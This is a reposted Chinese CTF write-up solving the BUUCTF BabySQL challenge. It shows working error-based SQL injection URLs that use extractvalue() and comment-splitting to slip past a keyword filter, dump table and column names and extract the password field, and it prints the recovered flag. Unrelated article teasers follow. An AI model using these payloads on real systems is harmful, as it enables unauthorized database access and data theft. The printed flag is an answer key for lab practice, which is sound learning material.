练习 12 Web [极客大挑战 2019]BabySQL

本题复习:1.常规的万能语句+SQL查询,union联合查询,Extractvalue()报错注入 extractvalue(1,concat(‘0x7e’,select(database())))%23

我一开始挨着试,感觉都无效
直到报错注入,查到了库名‘geek’
在这里插入图片描述

尝试查表名,才发现where被过滤掉了
select,or(所有出现o r挨着的单词),from,union都过滤了
在这里插入图片描述
关键字过滤,尝试用注释符 \**\分隔,有效
SQL注入针对关键字过滤的绕过技巧
一个一个试,把过滤的地方都分隔开

?username=111&password=1111'^extractvalue(1,concat('~',(sel\**\ect(group_concat(table_nam\**\e))fr\**\om(info\**\rmation_schema.tables)wh\**\ere(table_schema)like("geek"))))%23

成功拿到两个表名:
b4bsql,geekuser
(请注意图上的‘x7e’,是我输入的’0x7e’,也就是字符’~')
在这里插入图片描述
继续尝试查列名:

?username=111&password=111'^extractvalue(1,concat('~',(se\**\lect(group_concat(column_name))fro\**\m(info\**\rmation_schema.columns)wh\**\ere(table_name)like('geekuser')))) %23

无论查哪张表都是一个结果
id,username,password
在这里插入图片描述

查字段内容:

select group_concat(password) from geekuser where id =1 #第一个
# 调整为
?username=111&password=111'^extractvalue(1,concat('~',(sel\**\ect(group_concat(passwo\**\rd))fr\**\om(geekuser)whe\**\re(id)like(1))))%23

一直找到id=6 还是一些无效的话,继续
在这里插入图片描述
id=8,拿到一部分 flag{696fff3b-bb99-4e47-aec3-36
在这里插入图片描述
id=9,报错,9以后都报错
在这里插入图片描述
重新令id=8,用练习6中的技巧
用right函数指定打印右到左的30个字符group_concat(right(password,30))

?username=111&password=111'^extractvalue(1,concat('~',(sel\**\ect(group_concat(right(passwo\**\rd,30)))fr\**\om(b4bsql)whe\**\re(id)like(8))))%23

拿到后30个字符 b-bb99-4e47-aec3-367f253ee8ad}
在这里插入图片描述

拼接 flag{696fff3b-bb99-4e47-aec3-367f253ee8ad}
结束

搜索解法,此题用union联合查询也可以实现,但是我先做了HardSQL,所以确实没察觉到
BUUCTF-[极客大挑战 2019]BabySQL 1 详解

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/283327.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【赠书第21期】游戏力:竞技游戏设计实战教程

【赠书第21期】游戏力:竞技游戏设计实战教程

文章目录 前言 1 竞技游戏设计的核心要素 1.1 游戏机制 1.2 角色与技能 1.3 地图与环境 2 竞技游戏设计的策略与方法 2.1 以玩家为中心 2.2 不断迭代与优化 2.3 营造竞技氛围与社区文化 3 实战案例分析 4 结语 5 推荐图书 6 粉丝福利 前言 在数字化时代的浪潮中&…
阅读更多...
Linux文件 profile、bashrc、bash_profile区别

Linux文件 profile、bashrc、bash_profile区别

Linux系统中,有三种文件 出现的非常频繁,那就是 profile、bash_profile、bashrc 文件。 1、profile 作用 profile,路径:/etc/profile,用于设置系统级的环境变量和启动程序,在这个文件下配置会对所有用户…
阅读更多...
O2OA红头文件流转与O2OA版式公文编辑器基本使用

O2OA红头文件流转与O2OA版式公文编辑器基本使用

O2OA开发平台在流程管理中,提供了符合国家党政机关公文格式标准(GB/T 9704—2012)的公文编辑组件,可以让用户在包含公文管理的项目实施过程中,轻松地实现标准化公文格式的在线编辑、痕迹保留、手写签批等功能。并且可以…
阅读更多...
QT gridlayout 循环设置组件,表格也通用 已解决

QT gridlayout 循环设置组件,表格也通用 已解决

在需求中。经常遇到,表格 展示需求。 几乎都是json格式的。 // 列表配置文件QJsonArray listJsonArray getCfgJsonData("details_tab_table_config.json");if (listJsonArray.isEmpty()){return;}ui->gridWidget->setMaximumSize(QSize(310, 180)…
阅读更多...
【Mysql】面试题汇总

【Mysql】面试题汇总

1. 存储引擎 1-1. MySQL 支持哪些存储引擎?默认使用哪个? 答: MySQL 支持的存储引擎包括 InnoDB、MyISAM、Memory 等。 Mysql 5.5 之前默认的是MyISAM,Mysql 5.5 之后默认的是InnoDB。 可以通过 show engines 查看 Mysql 支持…
阅读更多...
SQL Server 文件组详解

SQL Server 文件组详解

数据文件组 SQL Server 数据库最常用的存储文件是数据文件和日志文件。 数据文件用于存储数据,由一个主要数据文件(.mdf)和若干个次要数据文件(.ndf)构成;日志文件用于存储事物日志,由.ldf文件…
阅读更多...
创龙教仪基于瑞芯微3568的ARM Cortex A-55教学实验箱 适用于人工智能 传感器 物联网等领域

创龙教仪基于瑞芯微3568的ARM Cortex A-55教学实验箱 适用于人工智能 传感器 物联网等领域

适用课程 Cortex-A55 ARM嵌入式实验箱主要用于《ARM 系统开发》、《ARM 应用开发》《物联网通信技术》、《嵌入式系统设计》、《移动互联网技术》、《无线传感器网络》、《物联网设计方法与应用》、《人工智能》等课程。 适用专业 Cortex-A55 ARM嵌入式实验箱主要面向电子信…
阅读更多...
Java项目:71 ssm基于ssm+vue的外卖点餐系统+vue

Java项目:71 ssm基于ssm+vue的外卖点餐系统+vue

作者主页:舒克日记 简介:Java领域优质创作者、Java项目、学习资料、技术互助 文中获取源码 项目介绍 系统功能 系统分为前台订餐和后台管理: 1.前台订餐 用户注册、用户登录、我的购物车、我的订单、商品列表 2.后台管理 商品管理&#xf…
阅读更多...
Linux:文件读取指令

Linux:文件读取指令

Linux:文件读取指令 cat指令more指令less指令head指令 & tail指令grep指令 cat指令 cat指令用于查看目标文件的内容。 语法:cat [选项][文件] 比如直接使用cat读取一个文件: 可以看到,其直接在指令的下方,输出了t…
阅读更多...
高效的Gitlab Flow最佳实践

高效的Gitlab Flow最佳实践

文章目录 一、git flow二、github flow三、gitlab flow四、基于gitlab flow的最佳实践1.语义化版本号2.测试发布3.bug修复 参考 业界包含三种flow: Git flowGithub flowGitlab flow 三种工作流程,有一个共同点:都采用"功能驱动式开发&…
阅读更多...
7-Zip 23.00 beta以上版本的压缩包兼容性问题

7-Zip 23.00 beta以上版本的压缩包兼容性问题

7-Zip 23.00 beta加入了ARM64 filter,7-Zip 24.02 beta加入了RISCV filter,这两个filter不能在之前的版本解压,这两个filter目前只适用于ARM64/RISCV的扩展名是exe/dll的可执行文件,其中ARM64的exe/dll目前比较常见,RI…
阅读更多...
kafka2.x版本配置SSL进行加密和身份验证

kafka2.x版本配置SSL进行加密和身份验证

背景:找了一圈资料,都是东讲讲西讲讲,最后我还没搞好,最终决定参考官网说明。 官网指导手册地址:Apache Kafka 需要预备的知识,keytool和openssl 关于keytool的参考:keytool的使用-CSDN博客 …
阅读更多...
Springboot+vue的作业管理系统+数据库+报告+免费远程调试

Springboot+vue的作业管理系统+数据库+报告+免费远程调试

项目介绍: Springbootvue的作业管理系统,Javaee项目,springboot vue前后端分离项目 本文设计了一个基于Springbootvue的前后端分离的作业管理系统,采用M(model)V(view)C(controller&…
阅读更多...
485问题汇总

485问题汇总

485问题汇总 485 通信波形没有负电压 问题描述:设备在没有外设的时候通信波形是正常的,即5V可以出来,在连接上设备后,设备的通信波形的-5V会随着设备的增多,电压会慢慢上升。当设备连接到24台设备后,485总…
阅读更多...
蓝桥杯十四届 试题E接龙数列

蓝桥杯十四届 试题E接龙数列

思路: 做题要想到用对立面解题,要求最短的,就可以先求最长的 //先求最长的接龙序列的长度maxx,再用长度n减去maxx //先声明dp数组,记录以0-9结尾的最长的接龙数列的长度 //以字符串的形式输入 //更新以b结尾的最大接…
阅读更多...
linux系统------------MySQL 存储引擎

linux系统------------MySQL 存储引擎

目录 一、存储引擎概念介绍 二、常用的存储引擎 2.1MyISAM 2.1.1MYlSAM的特点 2.1.2MyISAM 表支持 3 种不同的存储格式⭐: (1)静态(固定长度)表 (2)动态表 (3)压缩表 2.1.3MyISAM适…
阅读更多...
使用 Dify 和 AWS Bedrock 玩转 Anthropic Claude 3

使用 Dify 和 AWS Bedrock 玩转 Anthropic Claude 3

本篇文章,聊聊怎么比较稳定的使用 Anthropic Claude 3,以及基于目前表现非常好的模型,来做一些有趣的 AI Native 小工具。 写在前面 在实际体验了半个多月,月初上线的 Anthropic Claude Pro 后,发现 Claude 3 系列模…
阅读更多...
学习几个地图组件(基于react)

学习几个地图组件(基于react)

去年开发时用的公司封装的地图组件,挺方便的,但是拓展性不强,所以看看有哪些优秀的开源地图组件吧 1、React Leaflet 介绍:开源的JavaScript库,用于在web上制作交互式地图,允许你使用React组件的方式在应…
阅读更多...
QT作业。。

QT作业。。

1.使用手动连接,将登录框中的取消按钮使用t4版本的连接到自定义的槽函数中,在自定义的槽函数中调用关闭函数将登录按钮使用t5版本的连接到自定义的槽函数中,在槽函数中判断u界面上输入的账号是否为"admin",密码是否为&q…
阅读更多...
Web前端笔记+表单练习+五彩导航

Web前端笔记+表单练习+五彩导航

一、笔记 表单&#xff1a;数据交互的一种方式 登录、注册、搜索 <from> <input type""> --- <input type"text"> --- 普通输入框&#xff0c;内容在一行显示 <input type"password"> --- 密码框 <input type"…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023